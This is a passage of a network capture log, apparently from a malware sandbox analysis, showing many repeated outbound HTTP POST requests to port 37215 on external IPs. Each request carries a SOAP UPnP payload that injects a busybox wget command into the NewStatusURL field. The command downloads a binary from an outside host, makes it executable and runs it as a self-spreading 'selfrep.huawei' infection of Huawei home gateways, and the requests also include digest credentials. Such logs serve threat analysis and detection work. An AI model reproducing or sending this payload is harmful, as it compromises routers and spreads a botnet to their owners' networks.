2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2215192.168.2.133984441.17.203.3037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.598110914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2216192.168.2.1350218141.87.68.18337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.598126888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2217192.168.2.1341830157.152.24.18737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.598126888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2218192.168.2.1350718197.219.14.15837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.598165035 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2219192.168.2.134676441.250.127.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.598166943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2220192.168.2.134165841.12.183.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.598186016 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2221192.168.2.135350485.91.83.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.598203897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2222192.168.2.1347392157.55.216.4937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.598213911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2223192.168.2.1350598157.79.30.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.598368883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2224192.168.2.1347450197.97.170.4937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.598390102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2225192.168.2.1335844157.1.139.17737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.598464966 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
